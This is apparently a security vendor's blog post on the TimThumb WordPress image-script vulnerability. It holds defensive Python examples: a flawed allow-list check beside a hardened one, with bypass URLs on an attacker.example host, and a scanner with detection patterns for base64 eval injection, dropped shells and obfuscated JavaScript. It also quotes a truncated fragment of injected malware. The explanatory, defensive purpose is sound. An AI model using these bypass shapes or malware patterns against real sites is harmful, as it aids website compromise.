TimThumb Malware

    The ability to integrate useful third party plugins into a CMS like WordPress provides website owners the ability to add new functionality to existing websites. Unfortunately, this feature comes at a price.

    Third-party plugins often have security vulnerabilities that allow attackers to break into websites and use them to distribute malware. In this article we take a look at TimThumb, a script bundled with many WordPress themes and plugins.

    What is TimThumb?
    TimThumb is a small PHP script for cropping, zooming, and resizing images (jpg, png, gif) on the web. It is widely used by WordPress themes and plugins, on blogs, and in other applications.

    The Problem
    The main script is called timthumb.php. It lets a website serve images to visitors resized on the fly, while maintaining a cache of the generated images to save bandwidth and speed up page loading.

    It is this functionality that was the target of the TimThumb zero-day attack. TimThumb can fetch images from external sites and store them in a cache directory on the web server, which is an attractive vector for an attacker: anything the attacker can get TimThumb to fetch ends up as a file on the victim's server. Keep in mind, though, that TimThumb itself does not execute any malicious code. It is merely the delivery mechanism; once a PHP file has been written into a web-accessible cache directory, the web server runs it like any other PHP file as soon as the attacker requests it.

    Storing externally sourced content in a publicly accessible web server directory is the root cause of this issue. The checks TimThumb performed before storing such content were flawed: the allow-list of trusted image hosts was matched as a substring of the requested URL rather than against the parsed host name, so any URL that merely contained a trusted domain name somewhere in it was accepted, and the content check did not reject a file that carried PHP code behind a valid image header (for example a GIF header followed by PHP). This flawed mechanism has allowed attackers to distribute malicious code from many websites.
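    The following is an added example (not StopTheHacker's or TimThumb's code) showing the flawed substring allow-list check described above beside a host-name check, plus a cache-naming rule that never yields an executable extension. The allow-list entries and the cache-name scheme are assumptions chosen for illustration, not TimThumb's exact lists or file names.

```python
import hashlib
from urllib.parse import urlparse

# Constructed allow-list in the spirit of the image hosts TimThumb trusted by
# default (assumption: the exact entries vary between versions).
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com",
                 "wordpress.com", "img.youtube.com"]


def allowed_substring(src, allowed=ALLOWED_SITES):
    """The flawed check: 'does an allowed host name appear anywhere in the URL?'
    A URL only has to *contain* a trusted name to pass, so an attacker-controlled
    host such as blogger.com.<attacker-domain> or a query string mentioning
    flickr.com is accepted."""
    low = src.lower()
    return any(site in low for site in allowed)


def allowed_by_host(src, allowed=ALLOWED_SITES):
    """Hardened check: parse the URL, require http(s), and compare the parsed
    host name to the allow-list exactly or as a dot-bounded subdomain."""
    parts = urlparse(src)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return any(host == site or host.endswith("." + site) for site in allowed)


def cache_file_name(src):
    """Cache naming (an assumption, not TimThumb's own scheme): derive the name
    from a hash of the source URL and always use a non-executable extension, so
    nothing fetched from outside can be run as PHP even if the host check is
    ever bypassed again."""
    return "external_" + hashlib.sha256(src.encode()).hexdigest() + ".txt"


if __name__ == "__main__":
    # Constructed URLs: a legitimate image, and two bypass shapes for the flawed check.
    for url in ("http://farm1.flickr.com/123/abc.jpg",
                "http://blogger.com.attacker.example/shell.php",
                "http://attacker.example/x.jpg?ref=flickr.com"):
        print(url, "substring:", allowed_substring(url),
              "host:", allowed_by_host(url), "->", cache_file_name(url))
```

    The host check alone is not enough: the cache name rule matters because the shells described later in this post were only useful to the attacker because the fetched file landed on disk under a name the web server would execute.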

    A very good writeup on this topic is presented here.

    Analysis
    The malware runs each time the page is loaded in a visitor's browser. Malicious advertisements are displayed to the visitor, and a malicious redirection may occur (to the sites we listed in our recent post).

    • A malicious script is often deposited in the cache directory that timthumb uses to store cached images
      • The malicious script is typically a c99/c100 shell
      • These shells are web based, giving the attacker remote control of your website and hosting account
    • Base64-encoded malware is injected into wp-blog-header.php
    • JavaScript files may be modified (l10n.js and jquery.js are the primary targets)

    A sample of the injected JavaScript (hex-escaped strings fed to a packer's eval; truncated here):

    var _0x4ab4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63..
    \x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37..
    eval (function (_0x2f46x1,_0x2f46x2
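    As an added example (not the original post's code and not a product of StopTheHacker), here is a small scanner that looks for the three artifact types listed in the analysis and decodes hex-escaped strings like the sample above. The patterns, the directory layout, and the sample files it builds are assumptions chosen to match the shapes described; they are harmless constructed stand-ins, not real malware, and not a complete signature set.

```python
import os
import re
import tempfile

TIMTHUMB_NAMES = {"timthumb.php", "thumb.php"}   # names the script commonly ships under
JS_TARGETS = {"l10n.js", "jquery.js"}            # files the post names as targets
HEX_RUN = re.compile(r'(?:\\x[0-9A-Fa-f]{2}){8,}')               # long "\x.." runs
PACKER = re.compile(r'eval\s*\(\s*function\s*\(')                 # eval(function(p,a,c,k,e,d)
B64_EVAL = re.compile(r'eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(')


def decode_hex_escapes(s):
    """Turn "\\x64\\x20\\x35" into its printable form ("d 5"): the first step when
    triaging an obfuscated sample such as the one quoted above."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), s)


def scan_file(path, text, in_timthumb_cache):
    """Return (finding-kind, path) tuples for one file."""
    findings = []
    name = os.path.basename(path).lower()
    if in_timthumb_cache and name.endswith(".php"):
        findings.append(("php-in-timthumb-cache", path))   # dropped shell candidate
    if name == "wp-blog-header.php" and B64_EVAL.search(text):
        findings.append(("base64-eval-injection", path))
    if name in JS_TARGETS and (HEX_RUN.search(text) or PACKER.search(text)):
        findings.append(("obfuscated-js", path))
    return findings


def scan_tree(root):
    """Walk a WordPress tree. A 'cache' directory counts as TimThumb's only when
    it sits beside a timthumb.php/thumb.php, so PHP written by caching plugins
    into their own cache directories is not flagged."""
    findings, cache_dirs = [], set()
    for dirpath, dirs, files in os.walk(root):      # top-down: parent seen before 'cache'
        if TIMTHUMB_NAMES & {f.lower() for f in files} and "cache" in dirs:
            cache_dirs.add(os.path.join(dirpath, "cache"))
        for f in files:
            p = os.path.join(dirpath, f)
            with open(p, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_file(p, fh.read(), dirpath in cache_dirs))
    return sorted(findings)


def build_sample_site(root):
    """Constructed sample files reproducing the shapes described in the post."""
    samples = {
        "wp-blog-header.php":
            "<?php\neval(base64_decode('ZWNobyAxOw=='));\n"   # base64 of 'echo 1;'
            "require_once(dirname(__FILE__) . '/wp-load.php');\n",
        "wp-content/themes/demo/timthumb.php": "<?php /* clean stand-in */\n",
        "wp-content/themes/demo/cache/external_0a1b2c.php":
            "<?php /* stand-in for a dropped c99-style shell */\n",
        "wp-content/themes/demo/cache/2f8e1d.jpg": "benign cached image stand-in\n",
        "wp-includes/js/l10n.js":
            r'var _0x4ab4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63"];'
            + "\neval(function(p,a,c,k,e,d){return p}('',0,0,[],0,{}));\n",
        "wp-includes/js/jquery.js": "/*! clean jQuery stand-in */\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the sample tree in a temp dir, scan it, and return the finding kinds."""
    root = tempfile.mkdtemp(prefix="tt-scan-")
    build_sample_site(root)
    return [kind for kind, _ in scan_tree(root)]


if __name__ == "__main__":
    for kind in demo():
        print(kind)
    print(decode_hex_escapes(r'\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63'))
```

    Point scan_tree at a real document root to use it for triage; the decoded sample above reads as a fragment of packer output ("d 5(){b 0=2.c"), which is why the scanner treats long hex-escape runs and eval(function( as indicators rather than trying to match the payload itself.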
    

    How do I protect my site?
    StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…